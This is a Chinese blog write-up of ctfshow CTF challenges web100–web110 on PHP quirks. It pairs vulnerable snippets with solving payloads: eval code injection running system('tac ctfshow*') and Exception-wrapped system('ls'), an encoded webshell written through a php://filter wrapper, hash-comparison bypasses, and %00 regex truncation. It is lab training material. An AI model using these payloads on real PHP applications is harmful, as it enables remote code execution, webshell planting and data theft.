【ctfshow】PHP特性2

已于 2022-04-09 14:56:37 修改
阅读量852 收藏 4
点赞数 2
分类专栏: 刷题记录 文章标签: webview mariadb php
于 2022-02-20 21:21:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61109509/article/details/123035782
版权

目录

        web100

web101

web102

web103

web104

web105

web106

web107

web108

web109

web110

 web100

include("ctfshow.php");
//flag in class ctfshow;
$ctfshow = new ctfshow();
$v1=$_GET['v1'];
$v2=$_GET['v2'];
$v3=$_GET['v3'];
$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
if($v0){
    if(!preg_match("/\;/", $v2)){
        if(preg_match("/\;/", $v3)){
            eval("$v2('ctfshow')$v3");
        }
    }
  • &&和and优先级不一样

&& > || > = > and > or 

include("ctfshow.php");
//flag in class ctfshow;
$ctfshow = new ctfshow();
$v1=$_GET['v1'];
$v2=$_GET['v2'];
$v3=$_GET['v3'];
$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
if($v0){
    if(!preg_match("/\;/", $v2)){
        if(preg_match("/\;/", $v3)){
            eval("$v2('ctfshow')$v3");
        }
    }
  •  is_numeric()函数 检测是否为数字或字符串

我们只要让v1等于数字就可以进入循环

  • v2没分号,v3有分号

/?v1=1&v2=system('tac ctfshow*')&v3=;

/?v1=1&v2=var_dump($ctfshow)&v3=;

  • var_dump()此函数显示关于一个或多个表达式的结构信息,包括表达式的类型与值。 

 0x2d 转换为ascii码是-

两个小细节(关于我自己):几个get同时提交用&,system(' ') 捕获

web101

include("ctfshow.php");
//flag in class ctfshow;
$ctfshow = new ctfshow();
$v1=$_GET['v1'];
$v2=$_GET['v2'];
$v3=$_GET['v3'];
$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
if($v0){
    if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\)|\-|\_|\+|\=|\{|\[|\"|\'|\,|\.|\;|\?|[0-9]/", $v2)){
        if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\(|\-|\_|\+|\=|\{|\[|\"|\'|\,|\.|\?|[0-9]/", $v3)){
            eval("$v2('ctfshow')$v3");
        }
    }
    
}

 /?v1=1&v2=echo new ReflectionClass&v3=;

提交不了,发现提示少了一位。那就拿bp爆破,得出最后一个字母是7 

 对反射类的了解

<?php
class A{
public static $flag="flag{123123123}";
const  PI=3.14;
static function hello(){
    echo "hello</br>";
}
}
$a=new ReflectionClass('A');


var_dump($a->getConstants());  获取一组常量
输出
 array(1) {
  ["PI"]=>
  float(3.14)
}

var_dump($a->getName());    获取类名
输出
string(1) "A"

var_dump($a->getStaticProperties()); 获取静态属性
输出
array(1) {
  ["flag"]=>
  string(15) "flag{123123123}"
}

var_dump($a->getMethods()); 获取类中的方法
输出
array(1) {
  [0]=>
  object(ReflectionMethod)#2 (2) {
    ["name"]=>
    string(5) "hello"
    ["class"]=>
    string(1) "A"
  }
}

web102

highlight_file(__FILE__);
$v1 = $_POST['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
$v4 = is_numeric($v2) and is_numeric($v3);
if($v4){
    $s = substr($v2,2);
    $str = call_user_func($v1,$s);
    echo $str;
    file_put_contents($v3,$str);
}
else{
    die('hacker');
}
  • 利用v2传入 一句话木马的hex编码,并且在头部加上两个数字。 v1 传入hex2bin函数名。利用call_user_func 转为木马。 同时,v3传入 文件名。用file_put_contents 写入 木马。
  • 为了让webshell传进去的是数字,我们应先将一句话转为base64,再讲base64转16进制
  • 构造一句话 

$a='<?=`cat *`;';        //这里虽然``反引号无回显,但是短标签自带echo,读取所有的目录
$b=base64_encode($a);  // PD89YGNhdCAqYDs=
$c=bin2hex($b);      //这里直接用去掉=的base64

<?php ?>与<?= ?>等价

system与``是等价的

<?=`cat *`;相当于<?php system('ls');?>这种写法没有空格也没有php,可以绕过一些过滤

说明:<?=是php的短标签,是echo()的快捷用法 

  • 为什么这么做?

因为base64的编码范围 a-z  A-Z 0-9 /=  这些字符经过16进制编码后为大部分为数字(基本都在ascii码范围内),属于数字字符串,所以有机会绕过。 如果中间有 字母e,那么完全会被is_numberic 当成 科学计数法!!! 

  • substr ($str,$n)

    返回 指定的字符串str  从n往后的字符串.所以前面补两位任意函数

get:v2=115044383959474e6864434171594473&v3=php://filter/write=convert.base64-decode/resource=1.php 
post: v1=hex2bin
  • call_user_func — 把第一个参数作为回调函数调用
  • hex2bin 把十六进制值转换为 ASCII 字符, bin2hex把字符串转换16进制
  • file_put_contents ()向指定文件写入内容

web103

highlight_file(__FILE__);
$v1 = $_POST['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
$v4 = is_numeric($v2) and is_numeric($v3);
if($v4){
    $s = substr($v2,2);
    $str = call_user_func($v1,$s);
    echo $str;
    if(!preg_match("/.*p.*h.*p.*/i",$str)){
        file_put_contents($v3,$str);
    }
    else{
        die('Sorry');
    }
}
else{
    die('hacker');
}

?>

$str不是能按php顺序的所有字符

没什么影响,和web102一样 

web104

highlight_file(__FILE__);
include("flag.php");

if(isset($_POST['v1']) && isset($_GET['v2'])){
    $v1 = $_POST['v1'];
    $v2 = $_GET['v2'];
    if(sha1($v1)==sha1($v2)){
        echo $flag;
    }
}

直接传入两个相同的数 

web105

<?php
highlight_file(__FILE__);
include('flag.php');
error_reporting(0);
$error='你还想要flag嘛?';
$suces='既然你想要那给你吧!';
foreach($_GET as $key => $value){
    if($key==='error'){
        die("what are you doing?!");
    }
    $$key=$$value;
}foreach($_POST as $key => $value){
    if($value==='flag'){
        die("what are you doing?!");
    }
    $$key=$$value;
}
if(!($_POST['flag']==$flag)){
    die($error);
}
echo "your are good".$flag."\n";
die($suces);
?>

这是一道变量覆盖问题,通过变量覆盖使得$ error 或$suces为flag都能成功。

die($error);
//payload: get:a=flag  post: error=a
//此时if(!($_POST['flag']==$flag))执行成功

首先我们把$flag的值传给$a,接着再把$dotast的值传给$error,于是$error的值就是flag,再通过if判断die输出就是flag 

web106

highlight_file(__FILE__);
include("flag.php");

if(isset($_POST['v1']) && isset($_GET['v2'])){
    $v1 = $_POST['v1'];
    $v2 = $_GET['v2'];
    if(sha1($v1)==sha1($v2) && $v1!=$v2){
        echo $flag;
    }
}
  • sha1()函数无法处理数组类型,将报错并返回false
  • sha1相等但是值不相等的:

aaroZmOk   aaK1STfY   aaO8zKZF   aa3OFF9m

web107

highlight_file(__FILE__);
error_reporting(0);
include("flag.php");

if(isset($_POST['v1'])){
    $v1 = $_POST['v1'];
    $v3 = $_GET['v3'];
       parse_str($v1,$v2);
       if($v2['flag']==md5($v3)){
           echo $flag;
       }

}

parse_str()函数,将第一个变量内容识别,以数组的形式存在第二个变量中

<?php
parse_str("v1=111&v2=222",$arry);
var_dump($arry);
/**
 * array(2) {
["v1"]=>
string(3) "111"
["v2"]=>
string(3) "222"
}
 */

因为md5返回数组为空,所以v1也可传入一个空值。

v3[]=2   v1= 

web108

highlight_file(__FILE__);
error_reporting(0);
include("flag.php");

if (ereg ("^[a-zA-Z]+$", $_GET['c'])===FALSE)  {
    die('error');

}
//只有36d的人才能看到flag
if(intval(strrev($_GET['c']))==0x36d){
    echo $flag;
}

ereg %00正则截断 

  • strrev:反串字符串和数字

<?php echo strrev("I love Shanghai!"); ?>

echo !iahgnahS evol I  

  • intval() 获取变量的整数值 

首先正则表达式只会匹配%00之前的内容,后面的被截断掉,可以通过正则表达式检测,后面通过反转成877%00a,再用intval函数获取整数部分得到877,877为0x36d的10进制。

/?c=a%00778

web109

highlight_file(__FILE__);
error_reporting(0);
if(isset($_GET['v1']) && isset($_GET['v2'])){
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];

    if(preg_match('/[a-zA-Z]+/', $v1) && preg_match('/[a-zA-Z]+/', $v2)){
            eval("echo new $v1($v2());");
    }

}

?>

看大佬文章

  • 通过异常处理类Exception(system(‘cmd’))可以运行指定代码,并且能返回运行的结果(如果存在返回)只要是变量后面紧跟着(),那么对这个变量进行函数调用。例如$a = 'phpinfo'; $a()即调用phpinfo()

/?v1=Exception&v2=system('ls')

 /?v1=Exception&v2=system('tac fl36dg.txt') 

web110

highlight_file(__FILE__);
error_reporting(0);
if(isset($_GET['v1']) && isset($_GET['v2'])){
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];

    if(preg_match('/\~|\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]/', $v1)){
            die("error v1");
    }
    if(preg_match('/\~|\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]/', $v2)){
            die("error v2");
    }

    eval("echo new $v1($v2());");

}

?>

 FilesystemIterator 获取指定目录下的所有文件

getcwd()函数 获取当前工作目录

echo new FilesystemIterator(getcwd()); //默认只显示第一个文件,需要遍历

/?v1=FilesystemIterator&v2=getcwd

访问出现的文件即可

pipasound
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
PHP特性(网友根据ctfshow整理)1
08-03
3.== 弱类型与路径问题 5.三目运算符的理解+变量覆盖 8.and与&&的区别+反射类ReflectionClass的使用 3.== 弱类型与路径问题
CTFSHOW-命令执行
Monica的博客
09-03 4028
WEB29 题目: <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 分析:题目过滤了flag且忽略大小写 知识点:linux通配符 * 匹配任何字符串/文本,包括空字符串;*代表任意字符..
ctfshow-web入门-102
最新发布
2302_81156108的博客
05-01 1154
本菜鸡感觉自己又行了,请师傅们斧正!!!
php passthru,php的system()函数&exec()函数&passthru()函数的用法介绍
weixin_29164843的博客
03-10 988
本篇文章给大家带来的内容是关于PHP的system()函数&exec()函数&passthru()函数的用法介绍 ,有一定的参考价值,有需要的朋友可以参考一下,希望对你有所帮助。函数具体用法对于我这个菜鸟连php的system的用法都不知道,今天做个简单记录。system() 输出并返回最后一行shell结果。exec() 不输出结果,返回最后一行shell结果,所有结果可以保存到...
system("ls") 陷阱
StudyRecord的专栏
12-03 3915
测试发现一个崩溃,直接报EXC_BREAKPOINT(code=EXC_ARM_BREAKPOINT,subcode=0xdefe),没有任何代码行提示。搞了一天,也没头绪。 试了各种调试方法: 1、打开NSZombieEnabled; 2、添加objc_exception_throw.-[NSException raise]断点; 还是不能断到相关代码行,最后只能注释代码,发现syste
php绕过漏洞的函数,PHP中有漏洞的函数总结
weixin_30670053的博客
04-06 661
本篇文章讲述了PHP中存在这一些带有小漏洞的PHP函数,没有了解过PHP中有漏洞函数的可以看看,在实际的PHP开发中用到这些函数时需要注意哪些东西,我们废话少说,一起来看看这篇文章吧!1.弱类型比较2.MD5 compare漏洞PHP在处理哈希字符串时,如果利用”!=”或”==”来对哈希值进行比较,它把每一个以”0x”开头的哈希值都解释为科学计数法0的多少次方(为0),所以如果两个不同的密码经过哈...
ctfshow web入门 php特性
Sentiment的博客
04-11 5295
web89 intval() 函数用于获取变量的整数值,可preg_match过滤了数字,这里可以用数组绕过,因为preg_match无法处理数组 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if
WP2-ctfshow
02-24
2
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
PHP是一种广泛使用的服务器端脚本语言,常用于构建动态网页,因此,理解PHP语法和特性对于解决这类问题至关重要。 【压缩包子文件的文件名称列表】"CTFshow-变量循环取值-我的眼里只有$" 提供了一个可能包含源代码...
ctfshow web165 JPG二次渲染脚本(生成图片马)脚本
10-21
ctfshow web165 JPG二次渲染脚本(生成图片马)脚本
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
目录指南中的Python列表文件-listdir VS system(“ ls”)通过示例进行解释
cumi7754的博客
08-16 821
????欢迎 (???? Welcome) If you want to learn how these functions work behind the scenes and how you can use their full power, then this article is for you. 如果您想了解这些功能在后台如何工作以及如何充分利用它们的功能,那么本文适合您。 We will st...
php把get参数放入数组_PHP里的$_GET数组介绍
weixin_39875805的博客
12-29 955
在开发过程中,GET和POST无处不在。$_GET 变量是一个数组,内容是由 HTTP GET 方法发送的变量名称和值。$_GET 变量用于收集来自 method="get" 的表单中的值。从带有 GET 方法的表单发送的信息,对任何人都是可见的(会显示在浏览器的地址栏),并且对发送的信息量也有限制(最多 100 个字符)。在使用 $_GET 变量时,所有的变量名和值都会显示在 URL 中。所以在...
文件包含漏洞
Y-Y-K的博客
04-15 1593
文件包含漏洞文件包含漏洞分类本地文件包含(LFI)原因相关函数(php)利用绕过远程文件包含(RFI)原因利用伪协议Phar://(php归档)Zip://php://filter:php://input:日志文件包含访问日志SSH logsession包含条件利用例题临时文件利用例题environ条件利用fd自包含php7SegmentFault绕过(上面讲过的方法同样适用)编码绕过 文件包含漏...
[CTFSHOW]PHP特性
Huamang的博客
03-19 1747
web 89 include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 利用数组绕过:/?num[]=0 web 90 include
ctfshow 基础补web入门PHP特性102开始
giaogiao123的博客
06-06 691
<?php highlight_file(__FILE__); $v1 = $_POST['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3']; $v4 = is_numeric($v2) and is_numeric($v3); if($v4){ $s = substr($v2,2); $str = call_user_func($v1,$s); echo $str; file_put_contents($v3,$str); }
c/c++调用system获取返回值
Blueeyedboy521的博客
06-28 6953
在 c/c++ 程序中,可以使用 system()函数运行命令行,但是只能得到该命令行的 int 型返回值,并不能获得显示结果。例如system(“ls”)只能得到0或非0,如果要获得ls的执行结果,则要通过管道来完成的。首先用popen打开一个命令行的管道,然后通过fgets获得该管道传输的内容,也就是命令行运行的结果。 C/C++ 程序中调用命令行命令并获取命令行输出结果...
php system()
热门推荐
刘阳龙Herman的专栏
09-14 1万+
<br />php函数system详解:<br />执行外部程序并显示输出资料。 <br />system语法: string system(string command, int [return_var]); <br />system返回值: 字符串 <br />函数种类: 操作系统与环境 <br /> <br />system内容说明 <br />本函数就像是 C 语中的函数 system(),用来执行指令,并输出结果。若是 return_var 参数存在,则执行 command 之后的状态会填入 re
CTFshow——web入门——php特性(下篇)
h_adam的博客
02-06 5628
web入门——php特性web123web125web126 web123 题目 <?php error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g']))
ctfshow php特性
08-06
引用提到了"ctfshow-php特性-超详解(干货)",它是一篇关于ctfshow php的博客文章。引用和引用则展示了两段关于ctfshow php特性的代码。其中引用是一段关于RCE(远程代码执行)的代码,而引用是一段关于反射类和命令...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值